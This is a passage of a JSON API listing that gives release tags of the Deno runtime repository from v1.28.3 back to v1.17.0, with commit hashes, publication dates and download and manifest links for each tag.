url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f1